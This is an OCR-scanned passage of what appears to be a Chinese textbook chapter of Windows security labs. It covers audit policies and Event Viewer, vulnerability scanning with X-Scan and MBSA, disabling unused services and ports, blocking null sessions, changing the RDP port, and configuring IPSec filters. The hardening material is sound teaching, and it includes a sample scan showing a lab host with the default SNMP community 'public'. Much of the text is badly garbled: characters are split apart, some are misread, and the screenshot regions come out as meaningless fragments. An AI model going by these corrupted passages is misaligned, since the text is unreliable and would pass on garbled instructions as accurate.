这 些 设置 以 后 ， 生 成 的 事件 数量 将 十 分 庞大 ， 并 且 难 以 进行 分 类 。 只 有 在 已 经 计划 好 如 
何 使 用 所 生成 的 信息 时 ， 才 应 启用 这 些 设置 。 

8. 审核 过 程 跟踪 

“审核 过 程 跟踪 ”设置 用 于 确定 是 否 审核 事件 的 详细 跟踪 信息 ， 如 程序 激活 、 进 程 退 
出 、 句 柄 复制 和 间接 对 象 访问 等 。 启 用 “审核 过 程 跟 中 ”将 生成 大 量 事件 ， 因 此 通常 都 
将 其 设置 为 “无 审核 ”。 但是， 在 事件 响应 期 间 ， 即 过 程 详 细 日 志 开始 记录 和 这 些 过 程 被 
启动 的 时 间 ， 这 些 设置 会 发 挥 很 大 的 作用 。 

9. 审核 系统 事件 

“审核 系统 事件 ”设置 用 于 确定 在 用 户 重新 启动 或 关闭 其 计算 机 时 , 或 者 在 影响 系统 
安全 或 安全 日 志 的 事件 发 生 时 ， 是 否 进行 审核 。 由 于 同时 启用 系统 事件 的 失败 审核 和 成 
功 审 核 时 ， 仅 记录 极 少数 其 他 事件 ， 并 且 所 有 这 些 事件 都 非常 重要 ， 因 此 建议 在 组 织 中 
的 所 有 计算 机 上 启用 这 些 设置 。 

审核 的 结果 一 般 都 保存 到 系统 的 日 志 中 ， 可 以 使 用 事件 查看 器 查看 安全 日 志文 件 的 
内 容 以 及 在 日 志文 件 中 查找 特定 的 事件 。 事 件 查看 器 有 三 种 日 志 可 以 查看 :应 用 程序 日 
志 包 括 程 序 的 错误 、 警 告 和 信息 ; 安全 日 志 包 括 被 审核 的 事件 的 成 功 或 者 失败 信息 ， 这 
是 设置 审核 策略 的 结果 ;系统 日 志 包 括 Windows 产生 的 错误 、 和 警告 和 信息 。 


【实验 环境 】 
Windows XP 以 上 操作 系统 。 


【实验 步骤 】 

1. 设置 审核 策略 

(1) 单 击 【 控 制 面板 】 代 管理 工具 】 代 本 地 安全 策略 】 人 审核 策略 】 出 现 如 图 8-35 
所 示 的 管理 界面 。 

(2) 双击 右 侧 栏目 的 策略 ， 就 可 以 对 该 审核 策略 进行 设置 ,如 双击 【审核 登录 事件 】 
出 现 如 图 8-36 所 示 的 界面 ， 对 登录 事件 的 审核 策略 进行 修改 。 修 改 完成 后 单 击 【确定 】 
即 可 。 

(3) 除 上 述 审核 策略 的 制定 外 ，Windows 7 系统 还 可 以 对 指定 的 文件 或 文件 夹 的 访 
问 进行 审核 ， 如 系统 需要 对 Administrators 组 的 用 户 对 C:\Windows 文件 夹 写 文件 进行 审 
核 ， 具体 方法 如 下 : 右 击 Windows 文件 夹 ， 选 取 【 属 性 】 菜 单项 ， 出 现 属性 对 话 框 ， 单 
击 【 安 全 】 标 签 。 然 后 单 击 【 高 级 】 按 钮 ， 单 击 【 审 核 】 标 签 ， 对 审核 的 修改 需要 系统 
权限 ，UAC 会 提示 权限 提示 ， 单 击 【 继 续 】 按 钮 出 现 ， 单 击 【 添 加 】 按 钮 ， 出 现 【选择 
用 户 或 组 】 管 理 界面 ， 然 后 选择 Administrators， 单 击 【确定 】 按 钮 ， 出 现 如 图 8-37 所 
示 的 界面 ， 可 以 对 要 审核 的 事件 进行 编辑 。 
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牛 了 | 加 |X 革 | 氏 


由- 鸭 用 户 权 和 8 泊 
由 -的 安全 选项 
由 -多 公 角 弟 略 
国 软件 限制 策略 kt 
自 仿 严 安全 策略 ,在 本 地 计算 机 | 国 


图 8-35 ”审核 策略 


管理 界面 


Windows 操作 系统 安全 me 


审核 登录 事件 属性 


a 审核 登录 事件 


审核 这 些 操作 ; 


成 功 @) 
回 吴 由 况 ] 


图 8-36 ”审核 登录 事件 策略 修改 界面 
2. 使 用 事件 查看 器 


应 用 到 @) 和 ~ 
访问 G@) 成 功 。。 头 鸭 

完全 控制 回忆 

遍历 文件 夫 / 执 行文 伯 

3 人 

该 取 属 性 回 回 

读 取 扩展 属性 

创 蛙 文 件 / 瑟 入 教 据 

他 计 文 件 夹 /附加 数据 回 

写 入 属性 

写 入 扩展 属性 回 

蝇 除 子 文件 赤 及 文件 回 回 

及 除 - 
目 提 鬼 和 和 aa 中 的 对 EE 
管理 审核 

[CC 碎 ]( 取 |] 


图 8-37 Windows 文件 夹 的 审核 项 目 


(1) 单 击 【开始 】 按 钮 ， 指 向 【程序 】 指向 【管理 工具 】〗， 单 击 【事件 查看 器 】| 


【安全 性 】 出 现 如 图 8-38 所 示 的 界面 。 


(2) 双击 相应 的 日 志 事件 ， 可 以 查看 日 志 的 详细 信息 。 


(3) 默认 的 事件 查看 器 会 显 


示 所 有 的 事件 ， 为 了 更 改 日 志 中 显示 的 内 容 ， 可 以 使 用 


菜单 【查看 】| 人 筛选】 命令 来 查找 被 筛选 的 事件 ， 或 者 使 用 菜单 【查看 】|【 碍 找 】 命 令 


来 搜索 特定 的 事件 ， 如 图 8-39 所 示 。 


【实验 报告 】 
(1) 制定 审核 策略 。 
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目 事件 查看 妆 
文件 中 操作) 查看 WW) 帮助 中 
生生 | 加 | 轿 加 加 | 氏 


事件 查看 器 本 :| 安全 性 。 32, 706 个 事件 

应 用 程序 [类 型 |B 其 | 时间 | 

辆 系统 
18:03:16 
18:03:16 Security 账户 管理 
18:03:16 Security 特权 使 用 
18:03:16 Security 特权 使 用 
18:03:15 Security 特权 使 用 国 | 

团 硬 到 二 | 国 | 图 


事件 类 型 
回 车 当中 
错误 四 ) 


人 


事件 来 源 Q) 
类 别 只 :; 

事件 ID 由); 
用 户 @): 

计算 机 员 : 
从 中: [第 一 人 事件 国 
到 四 : | 景 后 一 个 事 补 国 


图 8-39 使 用 事件 查看 器 的 过 滤 或 者 查找 日 志 中 的 事件 


根据 以 下 要 求 制定 系统 的 审核 策略 。 

e 记录 对 计算 机 不 成 功 的 访问 尝试 。 

e@ 记录 对 Ci\windows\system32\drivers\etc\hosts 文件 的 写 操作 。 

e 跟踪 是 否 有 人 尝试 破坏 计算 机 硬件 。 

e 记录 一 个 管理 员 执行 的 操作 以 跟踪 未 授权 的 更 改 。 

(2) 创建 一 个 文件 审核 策略 。 创 建 一 个 Audit 文件 夹 ， 在 该 文件 夹 下 创建 一 个 文件 
Audit.txt， 修 改 Audit.txt 的 审核 记录 。 对 用 户 组 Everyone 审核 : 创建 文件 / 写 入 数据 ， 删 
除 ， 更 改 权限 的 成 功 和 失败 事件 。 然 后 更 改 Audit 文件 夹 的 Everyone 权限 为 读 权限 ， 删 


除 其 他 权限 ， 


阻止 从 它 的 父 文件 夹 继 承 权限 。 


(3) 查看 安全 日 志 ， 打 开 【 事 件 查看 器 〗， 查 看 日 志 的 内 容 。 
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【思考 题 】 
分 析 系统 审核 在 系统 安全 中 的 作用 。 


8.3.2 ”系统 安全 扫描 


【实验 目的 】 
掌握 Windows 平台 下 漏洞 扫描 原理 和 作用 ， 能 够 根据 漏洞 扫描 的 结果 对 系统 进行 安 
全 配置 。 


【原理 简介 】 

漏洞 扫描 就 是 对 重要 计算 机 信息 系统 进行 检查 ， 发 现 其 中 可 被 黑客 利用 的 漏洞 。 漏 
洞 扫 描 的 结果 实际 上 就 是 系统 安全 性 能 的 一 个 评估 ， 它 指出 了 哪些 攻击 是 可 能 的 ， 因 此 
成 为 安全 方案 的 一 个 重要 组 成 部 分 。 

目前 ， 漏 洞 扫 描 ， 从 底层 技术 来 划分 ， 可 以 分 为 基于 网 络 的 扫描 和 基于 主机 的 扫描 

基于 网 络 的 漏洞 扫描 器 ， 就 是 通过 网 络 来 扫描 远程 计算 机 中 的 漏洞 。 比 如 ， 利 用 低 
版 本 的 DNS Bind 漏洞 ， 攻 击 者 能 够 获取 root 权限 ， 侵 入 系统 或 者 攻击 者 能 够 在 远程 计 
算 机 中 执行 恶意 代码 。 使 用 基于 网 络 的 漏洞 扫描 工具 ， 能 够 监测 到 这 些 低 版 本 的 DNS 
Bind 是 否 在 运行 。 一 般 来 说 , 基于 网 络 的 漏洞 扫描 工具 可 以 看 作 一 种 漏洞 信息 收集 工具 ， 
能 根据 不 同 漏洞 的 特性 ， 构 造 网 络 数据 包 ， 发 给 网 络 中 的 一 个 或 多 个 目标 服务 器 ， 以 判 
断 某 个 特定 的 漏洞 是 否 存 在 。 

基于 主机 的 漏洞 扫描 器 ， 扫 描 目 标 系统 的 漏洞 的 原理 ， 与 基于 网 络 的 漏洞 扫描 器 的 
原理 类 似 ， 但 是 ， 两 者 的 体系 结构 不 一 样 。 基 于 主机 的 漏洞 扫描 器 通常 在 目标 系统 上 安 
装 了 一 个 代理 (Agent) 或 者 是 服务 〈Services)， 以 便 能 够 访问 所 有 的 文件 与 进程 ， 这 也 
使 得 基于 主机 的 漏洞 扫描 器 能 够 扫描 更 多 的 漏洞 。 

【实验 环境 】 

Windows XP 及 其 以 上 操作 系统 ，X-Scan v3.3，Microsoft Baseline Security Analyzer 
2.0。 


【实验 步骤 】 

1. 使 用 X-Scan 对 系统 进行 安全 扫描 分 析 

(1) 启动 X-Scan v3.3， 出 现 如 图 8-40 所 示 的 界面 。 

(2) 单 击 菜单 【设置 】| 【扫描 参 数 】 设 置 扫描 参数 ， 如 图 8-41 所 示 ， 可 以 设置 扫描 
范围 ， 可 以 是 单机 也 可 以 是 多 个 机 器 ， 其 他 扫描 模块 的 设置 可 以 根据 需要 进行 设置 。 

(3) 单 击 菜单 【文件 】|【 开 始 扫描 】， 扫 描 结 束 后 ，X-Scan 会 给 出 当前 系统 的 一 份 
安全 风险 分 析 报 告 ， 在 该 报告 中 指出 当前 系统 配置 中 的 安全 漏洞 和 对 应 的 解决 方案 。 
图 8-42 显示 了 一 个 扫描 结果 ,指出 系统 存在 一 个 安全 漏洞 ，SNMP 的 口令 使 用 默认 口令 
public 。 
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文件 WW) 设置 四 查看 区 工具 加) Langaage 帮助 区 ) 
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一， 系统 要 求 : Windows NT/20007XP/72003 
人 了 系列 拘 作 系统 ， 推 荐 运行 于 Winaows 2000 以 上 


erver 版 Window: 


| 二， 功能 简介 : 
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图 8-40 X-Scan 漏洞 扫描 工具 


指定 I? 范 围 , 
192. 168.0. 1 
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由 本 党 通 信息 漏洞 信息 | 错误 信息 | 
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于 1052/tep ~ DCE Services Enuneration 
由 [192. 168.0 445ytcp - SMB 
日- 国 445/tep [192. 168.0 1075/tep ~ DCE Services Enuneration 
® Vi ft-ds'| [192. 168. 0. 1081/tcp - DCE Services Enuneration 
a [192. 168.0 1101/tep ~ DCE Services Enuneration 
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由 [192. 168.0 1103/tep 一 DCE Services Enuneration 
[192. 168.0. 1]: 445/tep - 可 电 接 注 册 表 
于 [192. 168.0.1]; 445/tep ~ 可 以 通过 SWBi 表 
由 [192. 168.0 1109/tep ~ DCE Services Enuneration 
由 [192. 168, 0. 1110/tcp ~ DCE 让 庆 在 党" 
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1] 
1 
1 
1] 
1 
1] 
1 
1] 
1] 

.1] 

[192. 168.0 | 161/fudp - 
1 
1] 
1] 
1 
1] 
1 
1] 
1] 
1] 
1] 
1 


国 smp 口 令 : public [192. 168.0.1]: 161/udp — 
(snmp 系统 信 息 [192. 168.0. 1]: 161/wdp - 通过 Si0IP 术 举 Laman 共 享 信息 P 
192. 168.0. 1]: 11187tcp ~ DCE Services Enuneration 
a sm 网 络 界 面 信息 | 
~ P| lm [192. 168. 0. 1617udp — ee 
二 smmp-IP 信 息 [192. 168.0. 1]: 161/wap - 通过 SIP 术 举 Lanman 服 务 列表 
人 GD) smmp-TCP 信 息 [192. 168.0. 445/tcp -SMB 获取 主机 SID 
supe 信息 [192. 168. 0. 1]: 4332/tep -~ DCE Services Enuneration 
a L192. 168.0. 1028/udp - DCE Services Enuneration 
全 ) smmp-Wins 用 户 列表 上 3 168.0. 135/tep - DCE Services Emumeration 
测 脚 本 192. 168.0. 1]: 1026/tcp - DCE Services Enuneration 
别 局 画 |(192. 188.0.1]: i029/tep - DCE Services Enomeration 


Active thread: 0 


图 8-42 扫描 结果 
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(4) 根据 扫描 结果 可 以 对 系统 的 安全 漏洞 进行 修补 。 
2. 使 用 微软 Microsoft Baseline Security Analyzer 对 系统 进行 漏洞 扫描 
(1) 启动 Microsoft Baseline Security Analyzer， 出 现 如 图 8-43 所 示 的 界面 。 


人 Hicrosoft Baseline Security énalyzer 2 


亿 “ Baseline Security Analyzer 


Windows 操作 系统 安全 Bl 


Microsoft Baseline Security 
Analyzer 


口 Welcome 

© Pick a computer to scan 

© Pick muliple computers to scan 
回 Pick ase ottb 
器 vew。 


See Also 


回 Microsoft Baseline Secuiy 
Anabzer Help 


回 About Microsoft Baseline Securlty 
Analyzer 


回 Microsoft Secuiy Web ste 


Welcome to the Microsoft 
Baseline Security Analyzer 


The Microsoft Baseline Securi Analyzer IMBSA) 
checks computers running Microsoft 

Windows® Server 2003, Windows XP, or 
Windows 2000 for common security 
misconfigurations. You must have administrator 
privieges for each computer you want to scan 


Note that on computers running Windows XP and 
using simple fle sharing, only local scans can be 


图 8-43 Microsoft Baseline Security Analyzer 


(2) 单 击 左 侧 的 Pick a computer to scan 选择 扫描 主机 ， 并 设置 扫描 参数 ， 如 图 8-44 


所 示 。 


因 
Pick a computer to scan 二 | 
Specily the compuler you want to scan You can enter elher the computer name or its IP addiess 
Computer name: [WORKGROUP\DOCUMENT 国 | (tis computen) 
IP addess | 国 
Secuiy Ieport name XD%-%C% [XT 
XD% = domain, XC% = computer, XT% = date and time, SIP% =|P addres: 
We 回 Check for Windows adninistrative vulnerabilties 
加 Check for weak passwords 
回 Check for IlS administrative yuinerabilties 
回 Check for SQL administrative vuinerabilties 
回 Check or securly updates 
回 Configure computers for Microsof Update and scanning prerequis| 
© Advanced Update Services options: 
I) Scan using assigned Update Services servers only 
I Scan using Microsoh Update ony 
Leam more about Scanning Options 四 
Siart scan 辆 | 
2 


图 8-44 ”扫描 参数 设置 


(3) 单 击 Start scan 开始 扫描 ， 扫 描 结束 后 系统 给 出 当前 主机 安全 分 析 报 告 ， 如 
图 8-44 所 示 。 安 全 报告 包括 安全 升级 分 析 报 告 ， Windows 系统 扫描 ，IS 系统 扫描 ，SQL 
Server 系统 扫描 ， 桌 面 系统 扫描 等 部 分 ， 对 于 给 出 的 每 个 漏洞 系统 都 给 出 了 解决 方案 ， 
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如 图 8-45 所 示 。 
View security report 
Sor Drder | Score [worst frst] 图 | 
Scanned with MBSA version: 2050292 本 
Catalog synchronization date: 
Security update catalog: Microsoft Update 
Security assessment: Severe Risk (One or more criical checks 
faled) 
Security Update Scan Results| 
KR ce Secury 5secui updales ae missing 
Updates What was scanned Result detals How to corectthis 
Mindows Scan Results 
Administrative Vulnerabilities 
器 Ineompiete Noincompiete sofware update instalations were found 
Updates What was scanned How to corect this 
一 
图 8-45 ”安全 报告 
【实验 报告 】 


(1) 使 用 X-Scan 和 Microsoft Baseline Security Analyzer 分 别 对 系统 进行 扫描 ， 并 分 
析 它 们 的 扫描 报告 。 


(2) 按照 扫描 报告 的 指示 修补 系统 的 安全 漏洞 。 
【思考 题 】 
比较 分 析 X-Scan 和 Microsoft Baseline Security Analyzer 的 优 缺 点 。 


_ 4 _ 网 络 安全 


8.4.1 网 络 服务 管理 


【实验 目的 】 

掌握 Windows 环境 中 网 络 服务 的 安全 管理 技术 。 

【原理 简介 】 

Windows 中 有 许多 用 不 到 的 服务 自动 处 于 激活 状态 ， 它 们 中 可 能 存在 安全 漏洞 ， 使 
得 攻击 者 能 够 控制 机 器 。 为 了 系统 的 安全 ， 应 该 把 用 不 到 的 服务 及 时 关闭 ， 从 而 可 以 减 
少 安全 风险 。 

另外 需要 把 系统 用 不 到 的 网 络 端口 也 关闭 ， 以 防止 黑客 的 攻击 。 
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【实验 环境 】 
Windows 7/XP 系统 。 


【实验 步骤 】 

1. 服务 管理 

要 启动 、 停 止 、 暂 停 、 恢 复 或 重新 启动 服务 ， 请 按照 以 下 步骤 操作 。 

(1) 打开 控制 面板 ， 双 击 【 管 理工 具 】 目 录 ， 然 后 双击 【服务 】 如 图 8-46 所 示 。 


文件 FE) 操作 查看 WW) 帮助 中 
马祖 | 加 | 晕 团 图 | 国 | 1 本 


EREUEEERDEIEOIESTTE 
管理 卷 影 复制 服务 拍摄 的 软件 卷 影 复制 。 加 ; 
支持 网 络 上 计算 机 pass-through 帐户 登录 身份 验 
。 使 授权 用 户 能 好 通过 使 用 Netlleeting 跨 企业 int 图 | 
管理 “网 络 和 拨号 连接 ”文件 夹 中 对 和 象 ， 在 其 中 您 一 
为 在 同一 台 计算 机 或 不 同 计算 机 上 运行 的 程序 提供 ; 
管理 动态 数据 交换 DDE) 网 络 共享 。 如 果 此 服务 妈 
收集 并 保存 网 络 配 置 和 位 置信 息 ， 并 在 信息 改动 时 ; 
为 自动 网 络 提供 管理 基于 域 的 XML 配置 文件 . 
yorton AntiVirus. . ， 处 理 Horton Antiyirus 自动 防护 事件 。 
纺 WT LI Security S. . 。 为 使 用 传输 协议 而 不 是 命名 管道 的 远程 过 程 调用 人 E 
a PE 村 闪 BT 人 加 
下 


图 8-46 ”服务 管理 界面 


(2) 在 右 侧 窗 格 中 ， 单 击 要 启动 、 停 止 、 暂 停 、 恢 复 或 重新 启动 的 服务 ， 在 【操作 】 
菜单 上 ， 单 击 【 启 动 】 【停止 、【 和 暂停 【恢复 】 或 【重新 启动 】。 
(3) 要 配置 服务 启动 的 方式 ， 右 击 要 配置 的 服务 ,然后 单 击 【 属 性 】。 在 【常规 】 选 
项 卡 上 ， 单 击 【 启 动 类 型 】 列 表 中 的 【自动 【手动 】 或 【禁用 】)， 如 图 8-47 所 示 。 
Wessenger 的 属性 (本 地 计算 机 ) 


「 杠 ”| 主 录 [包揽 [依存 关 系 | 


服务 名 称 Nessenger 


显示 名 称 中 :属于 neer 


描述 虽 : 的 wT 5 和 加 
可 执行 文件 的 路 径 oD : 
EVIDONS\systend2\svehost. exe -netsyes 


启动 关 型 EE): [自动 国 


服务 状态 : 


息 动 E) 停止 中 暂停 到) 恢复 


当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 


启动 参数 加 [ 


图 8-47 配置 启动 方式 
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(4) 要 指定 服务 可 以 用 来 登录 的 用 户 账户 ， 请 单 击 【 登 录 】 标 签 ， 然 后 执行 下 列 操 
作 之 一 : 要 指定 此 服务 使 用 本 地 系统 账户 ， 请 单 击 【 本 地 系统 账户 】， 要 指定 此 服务 使 用 
本 地 服务 账户 ， 请 单 击 【 此 账户 】， 然 后 输入 “NT AUTHORITY\LocalService”;， 要 指定 
此 服务 使 用 网 络 服务 账户 ， 请 单 击 【此 账户 ]】， 然 后 输入 “NT AUTHORITY\ 
NetworkService”; 要 指定 其 他 账户 ， 请 单 击 【 此 账户 】， 单 击 【浏览 】 然后 在 【选择 用 
户 】 对 话 框 中 指定 一 个 用 户 账户 。 完 成 后 ， 单 击 【 确 定 】 如 图 8-48 所 示 。 在 【密码 】 
框 和 【确认 密码 】 框 中 输入 用 户 账户 的 密码 , 然后 单 击 【 确 定 】。 如 果 选 择 了 【本 地 服务 】 
账户 或 【网 络 服 务 】 账 户 ， 密 码 必须 为 空 。 

2. 关闭 不 用 的 端口 

只 开放 服务 需要 的 端口 与 协议 ， 具 体 方 法 如 下 。 

依次 打开 【本 地 连接 】|【 属 性 】|【Intemet 协议 】|【 属 性 】， 然 后 单 击 【 高 级 】 单 击 
【选项 】|【TCP/P 筛选 】|【 属 性 】 如 图 8-49 所 示 ， 添 加 需要 的 TCP、UDP 端口 以 及 IP 
协议 即 可 。 根 据 服 务 开设 端口 ， 常 用 的 TCP 端口 有 : 80 端口 用 于 Web 服务 ; 21 端口 用 于 
FTP 服务 ，25 端口 用 于 SMTP; 23 端口 用 于 Telnet 服务 ，110 端口 用 于 POP3。 常 用 的 
UDP 端口 有 : 53 端口 DNS 域名 解析 服务 ; 161 端口 SNMP 简单 的 网 络 管理 协议 。 
8000、4000 用 于 OICQ， 服 务 器 用 8000 来 接收 信息 ， 客 户 端 用 4000 发 送信 息 。 

Hessenger 的 属性 (本 地 计算 机 ) ?x 


常规 恪 录 ”| 焦 复 [依存 关系 
澄 录 身份 
〇 本 地 东 统 账户 

口 花 许 服务 与 点 面 交 互 中) 
© TL) MAdninistrator 

省 码 亿 fe |] 回 启用 TCF/IP 争先 所 有 适配器 ) E) 

确认 密码 @; [reer 口 全 部 允许 中 〇 全 部 允许 吧 

Te 加 Rt 洗 中 | 加 Rft 许 四 
您 可 启用 或 停 用 以 下 所 列 的 硬件 配置 文件 服务 It) wp 端口 | 
服务 | be 
| 


ICP/IP 得 选 


硬件 配置 文件 
Undockaed Profile PB 有 | 


图 8-48 登录 账户 选择 图 8-49 ”端口 设 定 


3. 禁止 建立 空 连接 

默认 情况 下 ， 任 何 用 户 可 通过 空 连 接连 上 服务 器 ， 枚 举 账号 并 猜测 密码 。 空 连接 用 
的 端口 是 139， 通 过 空 连接 ， 可 以 复制 文件 到 远 端 服务 器 ， 执 行 一 个 任务 ， 这 就 是 一 个 
漏洞 。 可 以 通过 以 下 两 种 方法 禁止 建立 空 连接 。 

(1) 修改 注册 表 中 Local Machine\System\CurrentControlSet\Control\LSA-Restrict 
Anonymous 的 值 为 1。 

(2) 修改 Windows 7 的 本 地 安全 策略 。 设 置 【 本 地 安全 策略 】 的 【本 地 策略 】|【 选 
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项 】 中 的 RestrictAnonymous (匿名 连接 的 额外 限制 ) 为 【不 容许 枚 举 SAM 账号 和 共享 】 

4. 修改 默认 端口 

例如 Windows 7 Server 的 终端 服务 的 默认 端口 为 3389， 可 考虑 修改 为 别 的 端口 。 修 
改 方法 如 下 。 

服务 器 端 : 打开 注册 表 , 在 HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer 
\WinStations 处 找到 类 似 RDP-TCP 的 子 键 ， 修 改 PortNumber 值 。 

客户 端 : 按 正 常 步骤 建 一 个 客户 端 连接 ,选中 这 个 连接 , 在 【文件 】 菜 单 中 选择 【 导 
出 】， 在 指定 位 置 会 生成 一 个 后 级 为 .cns 的 文件 。 打 开 访 文件， 修改 Server Port 值 为 与 服 


务 器 端的 PortNumber 对 应 的 值 。 然 后 再 导入 该 文件 〈 方 法 :【 文 件 】 一 【导入 】， 这 样 
就 修改 了 客户 端 端口 。 
【实验 报告 】 


(1) 根据 实际 需要 找 出 本 系统 不 需要 的 服务 ， 把 这 些 服务 停 掉 。 
(2) 根据 实际 需要 制定 出 本 系统 所 需要 的 端口 ， 把 其 余 的 端口 关闭 。 


【思考 题 】 
查找 资料 指出 Windows 中 空 连接 可 能 带 来 的 危害 。 


8.4.2 IPSec 安全 配置 


【实验 目的 】 
掌握 Windows 下 IPSec 的 配置 方法 ， 利 用 IPSec 进行 安全 传输 。 


【原理 简介 】 

IPsec 在 IP 层 提 供 安全 服务 ， 它 使 系统 能 按 需 选择 安全 协议 ， 决 定 服务 所 使 用 的 算 
法 及 放置 需求 服务 所 需 密 钥 到 相应 位 置 。IPsec 用 来 保护 一 条 或 多 条 主机 与 主机 间 、 安 全 
网 关 与 安全 网 关 间 、 安 全 网 关 与 主机 间 的 路 径 。 

IPsec 能 提供 的 安全 服务 集 包 括 访问 控制 、 无 连接 的 完整 性 、 数 据 源 认 证 、 拒 绝 重 
发 包 《〈 部 分 序列 完整 性 形式 )、 保 密 性 和 有 限 传输 流 保密 性 。 因 为 这 些 服务 均 在 IP 层 提 
供 ， 所 以 任何 高 层 协议 均 能 使 用 它们 ， 例 如 TCP、UDP、ICMP、BGP 等 。 

这 些 目标 是 通过 使 用 两 大 传输 安全 协议 、 头 部 认证 (AH) 和 封装 安全 负载 (ESP)， 
以 及 密 钥 管理 程序 和 协议 的 使 用 来 完成 的 。 所 需 的 IPsec 协议 集 内 容 及 其 使 用 的 方式 是 
由 用 户 、 应 用 程序 和 /或 站 点 、 组 织 对 安全 和 系统 的 需求 来 决定 。 

在 Windows 操作 系统 中 内 艇 了 对 IPSec 的 支持 ， 可 以 方便 地 建立 主机 到 主机 、 网 络 
到 网 络 的 安全 通信 。IPSec 适用 于 基于 IPSec 策略 的 通信 。 可 以 使 用 IPSec 策略 来 确定 何 
时 应 使 用 IPSec 保护 计算 机 之 间 的 通信 。 还 可 以 使 用 IPSec 策略 控制 允许 进出 计算 机 网 
络 接口 的 数据 包 。 

IPSec 策略 基于 两 个 元 素 : 卫 筛选 器 列表 和 卫 筛选 器 操作 。Intemet 协议 IP) 筛选 
器 列表 是 一 个 协议 和 文件 夹 的 列表 。 例 如 ， 可 以 创建 一 个 允许 所 有 计算 机 访问 本 地 接口 
上 的 TCP 端口 80 的 筛选 器 列表 项 。 同 一 筛选 器 列表 中 的 另 一 项 可 能 允许 访问 本 地 接口 
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上 的 TCP 端口 23， 而 第 三 个 筛选 器 列表 项 可 能 允许 访问 本 地 接口 上 的 用 户 数据 报 协议 
(UDP) 端口 53 。 

如 果 到 达 计 算 机 接口 的 数据 包 在 筛选 器 列表 上 有 一 个 相 匹 配 的 项 ，IPSec 策略 代理 
将 应 用 分 配给 该 筛选 器 列表 的 筛选 器 操作 。 例 如 ， 如 果 向 上 述 筛选 器 列表 分 配 一 个 “ 阻 
止 ”筛选 器 操作 ， 那 么 ， 任 何 发 往 TCP 端口 80、TCP 端口 25 或 UDP 端口 53 的 数据 包 
都 将 被 阻止 。 不 过 ， 如 果 向 上 述 筛选 器 列表 分 配 一 个 “允许 ”筛选 器 操作 ， 则 允许 数据 
包 发 往 TCP 端口 80、TCP 端口 25 或 UDP 端口 53 。 


【实验 环境 】 
Windows XP 以 上 操作 系统 ，PC 两 台 。 


【实验 步 又 】 

(1) 创建 IPSec 筛选 器 列表 。 

要 创建 应 用 于 入 站 TCP 端口 80 和 TCP 端口 25 的 IPSec 筛选 器 列表 ,执行 以 下 操作 。 

@ 打开 【控制 面板 〗 选择 【管理 工具 】， 然 后 打开 【本 地 安全 策略 】 

@ 单 击 以 展开 安全 设置 。 右 键 单 击 左 窗 格 中 的 【IP 安全 策略 】 然后 单 击 【管理 卫 
筛选 器 表 和 筛选 器 操作 】 如 图 8-50 所 示 。 


文件 四 ”操作 和 查看 W) 各 助人 0 
中]| 旬 | 加 加 | 岛 | 道中 


安全 设置 和 入 并 
由 区 账户 策略 全 安全 服务 器 (需要 对 所 有 IF 通信 息 是 使 ，。 否 
日 A 父 客 户 冰 ( 仅 响 应 ) 正常 通信 (不 安全 的 )。..， 否 
全 市 全 服务器“ 清 求 安全 ) 。 对 所 有 IP 通信 总 是 使 .。 否 
由 e 包 PT 
和 自 人 
和 -多 软 件 限制 第 咯 
所 有 任务 多) 
查看 
副 新 四) 
导出 列表 
者 助 国 


管理 下 请 二 强 表 和 证 寺 器 操作 
图 8-50 ”IP 安全 策略 管理 


@ 单 击 【管理 IP 筛选 器 表 和 筛选 器 操作 】 对 话 框 中 的 【管理 IP 筛选 器 列表 】 标 签 ， 
然后 单 击 【 添 加 】 出 现 【IP 筛选 器 列表 】 界 面 ， 如 图 8-51 所 示 。 

@ 在 【名 称 】 框 中 输入 “入 站 TCP 80 和 25”， 然 后 在 【描述 】 框 中 输入 “允许 到 
TCP 端口 80 和 25 的 入 站 通信 ”。 

@ 单 击 以 清除 【使 用 “添加 向 导 ”】 复 选 框 ， 然 后 单 击 【添加 】 以 添加 一 个 新 的 第 
选 器 列表 项 。 
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国 IP 笠 选 赤 列 表 


名 称 吕 : 
| 入 站 TCP 80 和 25 
添加 .| 


描述 四 ): 
活 TCP 请 口 80 和 25 的 入 让 通信 JSSD | 


a blz] | 


克 使 用 “添加 向 导 ” 加 ) 


图 8-51 IP 筛选 器 列表 


@ 单 击 【 寻 址 】 标 签 。 在 【 源 地 址 】 框 中 单 击 【 任 何 卫 地 址 】。 在 【目标 地 址 】 框 
中 单 击 【 我 的 IP 地 址 〗。 此 配置 指明 该 筛选 器 将 应 用 于 入 站 数据 包 。 

@) 单 击 【 协 议 】 标 签 。 在 【选择 协议 类 型 】 框 中 单 击 TCP。 单 击 【从 任意 端口 】， 
然后 单 击 【 到 此 端口 】〗。 在 【到 此 端口 】 框 中 输入 “80”。 单 击 【 应 用 】 然后 单 击 【 确 定 】， 
如 图 8-52 所 示 。 


图 8-52 ”筛选 器 编辑 


以 类 似 方式 添加 到 端口 25 的 通信 。 

(2) 创建 基于 筛选 器 列表 的 IPSec 策略 。 

要 创建 基于 筛选 器 列表 的 IPSec 策略 ， 请 执行 以 下 操作 。 

@ 右键 单 击 左 窗 格 中 的 【IP 安全 策略 】 然后 单 击 【创建 IP 安全 策略 】。 在 【欢迎 
使 用 人 P 安全 策略 向 导 】 中 单 击 【下 一 步 】。 
@ 在 【IP 安全 策略 名 称 】 对 话 框 的 【名 称 】 框 中 ， 输 入 “入 站 TCP 80 和 25”， 然 
后 单 击 【下 一 步 】 如 图 8-53 所 示 。 
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JIP 安 全 策略 名 称 
命名 这 个 IP 安全 策略 并 且 给 出 一 个 简短 的 描述 


名 称 昌 ): 

站 TCF 80 和 25 
描述 中); 

| 区 咱 和 站 TCF 80 和 25 


图 8-53 ”策略 名 称 
@ 单 击 以 清除 【激活 默认 响应 规则 】 复 选 框 ， 然 后 单 击 【下 一 步 】。 
@ 在 【正在 完成 IP 安全 策略 向 导 】 对 话 框 中 ， 单 击 以 选中 【编辑 属性 】 复 选 框 (如 
果 尚 未 选中 )， 然 后 单 击 【 完 成 】。 
@ 单 击 【 规 则 】 标签 ， 单 击 以 清除 【使 用 “添加 向 导 ”】 复 选 框 ， 然 后 单 击 【 添 加 】。 
@ 选择 【IP 筛选 器 列表 】 选 项 卡 ， 单 击 【入 站 TCP 80 和 25 IP 筛选 器 列表 】 左 边 
的 选项 。 出 现 如 图 8-54 所 示 的 界面 。 


描述 
允许 到 TCP 端口 80 和 25 的 ... 
匹配 该 计算 机 与 任何 其 他 计算 


〇 所 有 匡 通信 重 匹配 该 计算 机 到 | 任何 其 他 计算 
